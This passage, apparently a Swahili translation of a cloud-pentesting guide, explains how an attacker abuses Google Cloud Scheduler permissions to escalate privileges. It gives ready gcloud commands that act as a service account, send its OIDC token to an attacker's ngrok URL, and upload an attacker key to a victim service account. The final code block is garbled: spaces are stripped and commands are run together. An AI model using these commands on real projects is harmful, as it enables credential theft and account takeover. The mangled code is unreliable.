Mshambuliaji mwenye ruhusa hizi anaweza kutumia Cloud Scheduler ku thibitisha kazi za cron kama Akaunti ya Huduma maalum. Kwa kuunda ombi la HTTP POST, mshambuliaji anapanga vitendo, kama kuunda bucket ya Hifadhi, kutekelezwa chini ya utambulisho wa Akaunti ya Huduma. Njia hii inatumia uwezo wa Scheduler kulenga *.googleapis.com mwisho na kuthibitisha maombi, ikimruhusu mshambuliaji kubadilisha mwisho wa Google API moja kwa moja kwa kutumia amri rahisi ya gcloud.
Wasiliana na API yoyote ya google kupitia googleapis.com na kichwa cha token ya OAuth
Unda bucket mpya ya Hifadhi:
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1
Ili kupandisha hadhi, mshambuliaji anaunda tu ombi la HTTP linalolenga API inayotakiwa, akijifanya kuwa Akaunti ya Huduma iliyoainishwa
Toa tokeni ya akaunti ya huduma ya OIDC
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
# Listen in the ngrok address to get the OIDC token in clear text.
Ikiwa unahitaji kuangalia jibu la HTTP unaweza tu kuangalia kumbukumbu za utekelezaji.
Kama katika hali ya awali, inawezekana kusaidia kusasisha ratiba iliyoundwa tayari ili kuiba token au kufanya vitendo. Kwa mfano:
gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
# Listen in the ngrok address to get the OIDC token in clear text.
Mfano mwingine wa kupakia funguo binafsi kwa SA na kujifanya kuwa hiyo:
# Generate local private keyopensslreq-x509-nodes-newkeyrsa:2048-days365 \-keyout /tmp/private_key.pem \-out /tmp/public_key.pem \-subj "/CN=unused"# Remove last new line character of the public keyfile_size=$(wc-c</tmp/public_key.pem)new_size=$((file_size-1))truncate-s $new_size /tmp/public_key.pem# Update scheduler to upload the key to a SAgcloudschedulerjobsupdatehttpscheduler_lab_1 \--schedule='* * * * *' \--uri="https://iam.googleapis.com/v1/projects/$PROJECT_ID/serviceAccounts/victim@$PROJECT_ID.iam.gserviceaccount.com/keys:upload?alt=json" \
--message-body="{\"publicKeyData\": \"$(cat/tmp/public_key.pem|base64)\"}" \--update-headers "Content-Type=application/json" \--location us-central1 \--oauth-service-account-email privileged@$PROJECT_ID.iam.gserviceaccount.com# Check the logs to check it worked# Build the json to contact the SA## Get privatekey in json formatfile_content=$(<"/tmp/private_key.pem")private_key_json=$(jq-Rn--argstr"$file_content"'$str')## Get ID of the generated keygcloudiamservice-accountskeyslist--iam-account=victim@$PROJECT_ID.iam.gserviceaccount.com# Create the json in a file{"type":"service_account","project_id":"$PROJECT_ID","private_key_id":"<key id from key list>","private_key":"$private_key_json","client_email":"victim@$PROJECT_ID.iam.gserviceaccount.com","client_id": "$(gcloud iam service-accounts describe victim@$PROJECT_ID.iam.gserviceaccount.com | grep oauth2ClientId | cut -d "'" -f 2)",
"auth_uri":"https://accounts.google.com/o/oauth2/auth","token_uri":"https://oauth2.googleapis.com/token","auth_provider_x509_cert_url":"https://www.googleapis.com/oauth2/v1/certs","client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/victim%40$PROJECT_ID.iam.gserviceaccount.com",
"universe_domain":"googleapis.com"}# Activate the generated keygcloudauthactivate-service-account--key-file=/tmp/fake_key.json
